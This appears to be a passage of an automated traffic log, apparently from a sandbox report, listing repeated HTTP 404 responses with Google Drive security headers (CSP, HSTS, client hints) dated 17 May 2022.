                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:45 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ivY4M/j03joDFKe5m7plng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:45 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SvoCkdVDDEQ6iiAfpTX/Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:46 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-IjtjrUxbKgdq71+m7MldRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:46 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-L5LxLLlRZ/8+mY235anmxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:46 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dixZd3oVcUqJ5ZowI5ZHug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:46 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-gIqzoOEthBk6NzsRjfkojQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:46 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nQQ82it87ymUmMUlCrhQ/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-ppBd6BxIdkwF/4JB9CCRVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uoaaLYFC4XMjS7pGI1dqgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-hlK1xeZnXXIiSLLV7kUDxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-gqRlxrVetUORroM5ycyxyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-28swOEu2Sqo9jgVe4jGJGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-bfEo8bv5vgm3j/EJ4T1H4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:47 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9p/dYz2IGL8dVCLIg+Ra1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-sikC54Z9CYuCuX58malXGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-uvWEHMsPkbyuEgWLPOk4Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2I0GaLQ6f8M/eqagjV/TJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-i+gMozs/M4RMt5MOLLHDAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RXftXdJr0dRFPdbjfgYH8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Rx/Vb0d09CMTY3XGV7cmHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
